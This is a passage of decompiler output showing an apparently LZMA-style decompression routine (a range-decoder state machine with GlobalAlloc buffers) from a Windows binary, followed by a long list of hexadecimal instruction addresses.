								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406925
0x00406925
0x0040692a
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00407007
0x00407007
0x0040700d
0x0040700d
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00000000
0x00407004
0x0040692c
0x0040692c
0x00406930
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x00406951
0x00406958
0x0040695b
0x00406966
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406975
0x00406993
0x00406995
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bba
0x00406bbd
0x00406b60
0x00406b66
0x00000000
0x00000000
0x00000000
0x00406bbf
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5d
0x00000000
0x00406b5d
0x00406977
0x00406977
0x0040697a
0x00406980
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a69
0x00406a6c
0x004069e3
0x004069e3
0x004069e9
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406af6
0x00406af9
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a99
0x00406a99
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b04
0x00406b04
0x00406b07
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00406cd0
0x00406cd0
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x004069f5
0x00000000
0x00000000
0x00000000
0x00406a72
0x004069be
0x004069c2
0x0040712f
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069e0
0x00000000
0x004069e0
0x00406a6c
0x00406975
0x004067a9
0x004067a9
0x004067b2
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00000000
0x00406f8e
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
